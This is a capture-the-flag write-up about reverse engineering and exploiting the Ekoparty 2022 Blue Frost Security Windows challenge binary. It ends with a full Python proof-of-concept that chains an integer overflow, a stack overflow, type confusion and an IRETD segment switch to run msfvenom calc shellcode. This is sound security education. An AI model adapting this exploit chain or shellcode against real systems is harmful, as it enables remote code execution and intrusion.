Reading Time: 16 minutes
Last month, during Ekoparty, Blue Frost Security published a Windows challenge. Since having a Windows exploitation challenge, is one of a kind in CTFs, and since I’ve found the challenge interesting and very clever, I’ve decided to post about my reverse engineering and exploitation methodology.
You can download the target application here (backup).
When exploring an unknown executable, one of the first things I always check is the security features that were built into the binary when it was compiled. If on Linux I’m used to checksec.sh, on Windows I use winchecksec or PESecurity; they aren’t kept updated but they serve our purpose.
Doing so, resulted in the following mitigations:
C:\Users\VoidSec>winchecksec.exe bfs-eko2022.exe Architecture : AMD64 Dynamic Base : "Present" ASLR : "Present" High Entropy VA : "NotPresent" Force Integrity : "NotPresent" Isolation : "Present" NX/DEP : "Present" SEH : N/A CFG : "NotPresent" RFG : "NotPresent" SafeSEH : N/A GS : "Present" Authenticode : False .NET : False
Some of these details can also be confirmed, at runtime, with a tool like System Informer (former Process Hacker):
This means that we are dealing with an x64, un-obfuscated, C++ (checked with DIE) compiled binary with ASLR, DEP and stack-canaries enabled mitigations but no CFG.
Once executed, the binary binds on 0.0.0.0
, port 31415
, and awaits client connection.
As per my methodology, I’ve proceeded with reverse engineering the high-level functionalities of each code block, renaming them with some meaningful labels. One thing that also helps me better visualize the code flow is colouring blocks:
I’ve then collapsed all irrelevant nodes, leaving me with the following simplified code graph:
I usually combine debugging and static code analysis in order to get the most out of both. I then proceeded to write a simple python “client” to interact with the target.
As soon as the software start, an always static (both in size and memory address) buffer is allocated in the heap:
As we can see from the VirtualAlloc()
API call above, the buffer is allocated at address 0x10000000
and it is of size 0x1000
(4096 bytes); the memory protection for the region is RWX
.
After that, we find the socket initialization, the server binding, and then it enters a loop, waiting for a client connection.
Note: the server is not multithread and only one client per time is allowed.
Data sent to the server is stored in the previously allocated heap-buffer and then a function is called. This function, opportunely renamed as handhshake_check()
, has the following prototype: handhshake_check(uint buffer_length, *buffer)
and once decompiled it results in the following code:
_BOOL8 __fastcall handhshake_check(__int64 buffer_length, const char * buffer) { return strncmp(buffer, Str2, 6 ui64) == 0; }
This function verifies if the first 6 characters of our buffer match with the string “Hello
“; if it does, the execution continues and the software sends back “Hi
“.
After that, the execution flow is transferred to another function, which I’ve renamed as data_processing()
and decompiled as follows:
int __fastcall data_processing(SOCKET socket) { int result; // eax int v2; // eax unsigned int i; // [rsp+20h] [rbp-F48h] unsigned int header_len; // [rsp+24h] [rbp-F44h] unsigned int len_0; // [rsp+24h] [rbp-F44h] CHAR CmdLine[3840]; // [rsp+30h] [rbp-F38h] BYREF char packet_type; // [rsp+F30h] [rbp-38h] char stack_buff[8]; // [rsp+F40h] [rbp-28h] BYREF char packet_type_0; // [rsp+F48h] [rbp-20h] unsigned __int16 packet_data_length; // [rsp+F49h] [rbp-1Fh] for ( i = 0; i < 0x1000; i += 16 ) { *(_QWORD *)&heap_buff[i] = 0x5050505050505050i64; *(_QWORD *)&heap_buff[i + 8] = 0xCF58585858585858ui64; } printf(" [+] Processing request\n"); header_len = recv(socket, stack_buff, 11, 0); if ( header_len == -1 ) return printf(" [-] Client data error\n"); if ( header_len < 11ui64 ) return printf(" [-] Bad size\n"); if ( *(_QWORD *)stack_buff != '2202okE' ) return printf(" [-] Wrong cookie value\n"); packet_type = packet_type_0; if ( packet_type_0 != 'T' ) return printf(" [-] Invalid packet type\n"); if ( (__int16)packet_data_length > 3840 ) // Integer Overflow return printf(" [-] Invalid packet size\n"); len_0 = recv(socket, heap_buff, packet_data_length, 0);// writing packet_data to heap-buffer printf(" [+] Data received: %i bytes\n", len_0); char_replace(CmdLine, heap_buff, len_0); if ( packet_type == 'T' ) { printf(" [+] Message received: %s\n", CmdLine); send(socket, CmdLine, len_0, 0); } else { printf(" [-] Unsupported message\n"); v2 = strlen(Str); send(socket, buf, v2 + 1, 0); } result = packet_type; if ( packet_type == 'X' ) { off_7FF720E1C000 = (__int64 (__fastcall *)(_QWORD))&heap_buff[len_0]; return off_7FF720E1C000(CmdLine); } return result; }
In this function:
0x5050505050505050
and 0xCF58585858585858
.0
.0x323230326F6B45
(“Eko2022
“).T
character. This field is used to determine the packet’s type.0xF00
(3840 bytes).I’ve named this structure: packet_header
struct packet_header{ DWORD cookie_value; BYTE packet_type; SHORT packet_data_len; }
After our packet’s header passes all the above validations, the server wait for the packet’s data. This packet (packet_data
) will be saved in the previously allocated heap-buffer.
char_replace()
Then a function renamed as char_replace()
is called; this function copies the content of packet_data
(stored in the heap), to a stack buffer (CmdLine
) of size 0xF00
(3840 bytes). While copying the data, it replaces all the occurrences of bytes 0x2B
and 0x33
with null-bytes.
__int64 __fastcall char_replace(_BYTE *CmdLine, _BYTE *heap_buffer, unsigned int size) { __int64 result; // rax unsigned int i; // [rsp+0h] [rbp-18h] for ( i = 0; ; ++i ) { result = size; if ( i >= size ) break; if ( *heap_buffer == 0x2B || *heap_buffer == 0x33 ) *CmdLine = 0; else *CmdLine = *heap_buffer; ++heap_buffer; ++CmdLine; } return result; }
After the copy and character replacement, the resulting data is sent back to the client.
The packet_data_len
comparison (which IDA’s decompiler fails to visualize adequately) is odd enough to investigate. As we can see from the raw assembly:
movsx eax, packet_data_length cmp eax, 0F00h jle short loc_7FF609B81386
The packet_data_len
value is loaded into the EAX
register by the MOVSX
opcode.
MOVSX
: copies the contents of the source operand to the destination operand and sign extend the value. In 64-bit mode, the instruction’s default operation size is 32 bits.
JLE
: It is a conditional jump that follows a test. It performs a signed comparison jump after acmp
if the destination operand is less than or equal to the source operand.
If we send a packet_data_len
of value 0xFFFF
, it will be sign-extended to 0xFFFFFFFF
, treated as a negative value by the following comparison and “bypass” the length check.
The precedent “Integer Overflow” directly leads to a stack-based buffer overflow when the char_replace()
function copies the content from the heap-buffer (at address 0x10000000
) onto the CmdLine[3840]
buffer using the length we have specified in the packet_header.packet_data_len
field.
Before trashing the stack with the linear overflow we have, is always better to check what’s interesting on it. If with a debugger we check what’s left on the stack, after the CmdLine[3840]
buffer, we will discover a couple of things:
CmdLine
buffer (filled with A’s up to its limit not to trigger the stack-based buffer overflow yet).packet_type
local variable.packet_header
buffer we’ve previously sent to the server./GS
flag and before data_processing()
’s epilogue we can see a call to __security_check_cookie()
function.main()
function.Simply overwriting the saved return pointer is not a viable option as we’ll also end up overwriting the stack canary, causing the OS to kill the entire process.
Unfortunately, we do not have an information leak either as the send()
function, responsible for echoing back the content of the CmdLine
buffer, is not using the data_lenght
value we control in the packet’s header but the actual size of packet_data
we’ve sent.
We should definitely come up with something different.
As mentioned before, one of the interesting pieces of data left on the stack, and sitting below our buffer, is the content of the packet_type
local variable. This value is later used for the type-check comparisons:
if ( packet_type == 'T' ) { printf(" [+] Message received: %s\n", CmdLine); send(socket, CmdLine, len_0, 0); } else { [--TRUNCATED--] } result = packet_type; if ( packet_type == 'X' ) { [--TRUNCATED--] } return result;
As we can overwrite its value (using the linear stack-based buffer overflow previously discovered), we can cause a “type confusion” and end up in the X
case.
If we successfully trigger the type confusion, the program will directly jump into the heap-buffer containing our packet_data
and the data written during the heap-buffer “initialization” (0x5050505050505050
and 0xCF58585858585858
).
These initialization bytes are not random, in fact, they are disassembled as:
pop rax pop rax pop rax pop rax pop rax pop rax pop rax iretd push rax push rax push rax push rax push rax push rax push rax push rax
Without any further modification the software crash with an Access Violation error on the iretd
instruction.
Note: the execution flow always jumps in the heap-buffer after the bytes we control. Cause of that, we cannot “bypass” nor overwrite the iretd
instruction.
If we really want to crack this challenge we should dive into the iretd
instruction.
iretd
Looking at the x86 Instruction Set Reference:
IRETD
– interrupt return double (32-bit operand size):Returns program control from an exception or interrupt handler to a program that was interrupted by an exception, an external interrupt, or a software-generated interrupt. In Real-Address Mode, the
IRET
instruction performs a far return to the interrupted program. During this operation, the processor pops the return instruction pointer, return code segment selector, and EFLAGS image from the stack to theEIP
,CS
, andEFLAGS
registers, respectively, and then resumes execution of the interrupted program or procedure.
Since we control the stack, we’re only left with the task of crafting it in a way that would allow us to gain code execution.
IRETD
expects the following values on the stack:
SS ESP EFLAGS CS EIP
We can easily point EIP
and ESP
to our heap-buffer we control, while I’ve taken the EFLAGS
value from WinDbg.
EIP
: 0x10000014
start of our heap-buffer plus an offset; used to directly land at the beginning of our shellcode.ESP
: 0x10000800
a “safe” place in the “middle” of our heap-buffer. Not at the beginning of our heap-buffer, as the shellcode will sit there, and not at the end to avoid stack’s consumption messing up outside the boundaries of the heap-buffer region, triggering access violation errors.EFLAGS
: 0x246
SS
and CS
on the other hand, were more difficult…SS
and CS
are used to index the Global Descriptor Table (GDT) which has descriptors for:
0x00
: Null descriptor0x10
: Kernel code segment0x18
: Kernel data segment0x20
: User code segment0x28
: User data segmentWe can explore them in a kernel-mode debugger, such as WinDbg, with the following command:
0: kd> !process 0 0 bfs-eko2022.exe PROCESS ffffe303936d7080 SessionId: 1 Cid: 0b38 Peb: 00dd2000 ParentCid: 0e90 DirBase: 119c67002 ObjectTable: ffffb48eed28d5c0 HandleCount: 52. Image: bfs-eko2022.exe 0: kd> .process /r /P ffffe303936d7080 Implicit process is now ffffe303`936d7080 .cache forcedecodeptes done Loading User Symbols ........ 0: kd> dd @gdtr fffff804`1645afb0 00000000 00000000 00000000 00000000 fffff804`1645afc0 00000000 00209b00 00000000 00409300 fffff804`1645afd0 0000ffff 00cffb00 0000ffff 00cff300 fffff804`1645afe0 00000000 0020fb00 00000000 00000000 fffff804`1645aff0 90000067 16008b45 fffff804 00000000 fffff804`1645b000 00003c00 0040f300 00000000 00000000 fffff804`1645b010 00000000 00000000 00000000 00000000 fffff804`1645b020 00000000 00000000 00000000 00000000
The first 24 bytes are “reserved” for kernel. For user mode, we want to use selectors 0x20
and 0x28
.
However, it’s not quite that straightforward. Because the selectors are all 16 bytes in size, the two least significant bits of the selector will always be zero. Intel uses these two bits to represent the Requested Privilege Level (RPL). These are zero when operating in ring-0 (kernel), but as we want to move to ring-3 (user mode) we must set them to “3”.
This means that our code segment selector will be (0x20 | 0x3 = 0x23)
, and our data segment selector will be (0x28 | 0x3 = 0x2B)
.
Now, if for the code selector we don’t have any problem, the data selector on the other hand falls into to the “bad bytes” replaced by the char_replace()
function.
For the code selector, we just need to find a value whose type is Data, RW
. I’ve looped through all the selectors and ended up with the value 0x53
:
0: kd> dg 0x53 P Si Gr Pr Lo Sel Base Limit Type l ze an es ng Flags ---- ----------------- ----------------- ---------- - -- -- -- -- -------- 0053 00000000`00000000 00000000`00003c00 Data RW Ac 3 Bg By P Nl 000004f3
CS
: 0x23
code segment selectorSS
: 0x53
stack segment selectorUsing the above settings will pivot the code execution flow up to the beginning of our shellcode but in 32-bit mode. Unfortunately, since the stack base
and limit
are completely messed up, as soon as we try to use the stack (e.g., PUSH EAX
) the program will crash.
To properly execute our shellcode, I’ve introduced the following “prologue” at the beginning of our shellcode: JMP 0x33:0x1000001c
This “prologue” will jump some bytes further in our prologue and it also has the nice property of allowing us to specify 0x33
as the new code segment, bringing us back into 64-bit mode.
Note: if you’re wondering why I’m allowed to use the 0x33
value, note that, it is a “bad byte” only on the stack but we’re now in the heap where it can lie unaffected.
Since x64-bit doesn’t need a valid stack segment selector (it’s not used), we can finally restore the stack pointer to a meaningful value. Luckily enough, the RCX
register still holds a reference to the original stack, before it was “polluted” by the IRETD
instruction. We can just transfer it back into RSP
with: mov rsp,rcx
.
With everything restored we can execute the shellcode and finally pop calc!
The complete (and commented) exploit code, IDA’s DB and target binary are available on my GitHub.
import socket import struct """ Exploit title: Ekoparty 2022 BFS Windows Challenge Exploit Authors: Paolo Stagno aka VoidSec - [email protected] - https://voidsec.com Grade: PoC Date: 20/11/2022 Tested on: Windows 10 Pro x64 22H2 Build 19045.2251 Category: remote exploit Platform: windows """ # msfvenom -a x64 --platform Windows -p windows/x64/exec cmd="calc" -f python -v shellcode shellcode_x64 = b"" # shellcode_x64 += b"\xcc" # INT3 shellcode_x64 += b"\xea\x1c\x00\x00\x10\x33\x00" # 32-bit shellcode prologue restoring the CS value to 0x33 - JMP 0x33:0x1000001c shellcode_x64 += b"\x48\x89\xCC" # 64-bit shellcode prologue restoring old stack pointer - MOV RSP, RCX # shellcode_x64 += b"\xcc" # INT3 shellcode_x64 += b"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00" shellcode_x64 += b"\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2" shellcode_x64 += b"\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" shellcode_x64 += b"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7" shellcode_x64 += b"\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c" shellcode_x64 += b"\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" shellcode_x64 += b"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52" shellcode_x64 += b"\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88" shellcode_x64 += b"\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" shellcode_x64 += b"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49" shellcode_x64 += b"\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34" shellcode_x64 += b"\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" shellcode_x64 += b"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0" shellcode_x64 += b"\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1" shellcode_x64 += b"\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" shellcode_x64 += b"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49" shellcode_x64 += b"\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41" shellcode_x64 += b"\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" shellcode_x64 += b"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0" shellcode_x64 += b"\x58\x41\x59\x5a\x48\x8b\x12\xe9\x57\xff" shellcode_x64 += b"\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" shellcode_x64 += b"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00" shellcode_x64 += b"\x41\xba\x31\x8b\x6f\x87\xff\xd5\xbb\xf0" shellcode_x64 += b"\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff" shellcode_x64 += b"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80" shellcode_x64 += b"\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a" shellcode_x64 += b"\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c" shellcode_x64 += b"\x63\x00" print("Ekoparty 2022 - BFS' Windows Challenge") print("> Exploit by VoidSec") client = socket.socket(socket.AF_INET, socket.SOCK_STREAM) client.connect(("127.0.0.1", 31415)) handshake = b"Hello\x00" print(f"[>] Sending handshake - {len(handshake)} bytes") client.send(handshake) resp = client.recv(3) if resp == b"Hi\x00": print("[+] ACK") # Packet's Header header = b"" header += b"Eko2022\x00" # cookie header += b"T" # packet type header += b"\xFF\xFF" # packet size; leads to integer overflow print(f"Header size: {len(header)} bytes") # Packet's Data packet_data_size = 3840 # 0xF00 packet_data = b"" # IRETD STACK; switch from x64 to x32 packet_data += struct.pack("<I", 0x10000014) # EIP; start of our heap-buffer + offset to land into our shellcode packet_data += struct.pack("<I", 0x23) # CS; selector for user mode packet_data += struct.pack("<I", 0x246) # EFLAGS; taken from WindDbg packet_data += struct.pack("<I", 0x10000800) # ESP; a "safe" place in the "middle" of our heap-buffer packet_data += struct.pack("<I", 0x53) # SS; a value I've found while debugging. It is of type Data RW print(f"IRETD STACK size: {len(packet_data)} bytes") # SHELLCODE packet_data += shellcode_x64 print(f"Shellcode size: {len(shellcode_x64)} bytes") packet_data += b"A" * (packet_data_size - len(packet_data)) # fill the buffer up to where we overwrite packet_type packet_data += b"X" # type confusion packet_data += b"X" * 7 # disassembled into 'pop rax' as we must not "trash" the stack # print(packet_data) print(f"[>] Sending packet: {len(header + packet_data)} bytes") client.send(header + packet_data) resp = client.recv(20) if resp == b"Unsupported message\x00": print("[+] Type Confusion Triggered") else: print("[!] Type Confusion Error") else: print("[!] Handshake Error") client.close()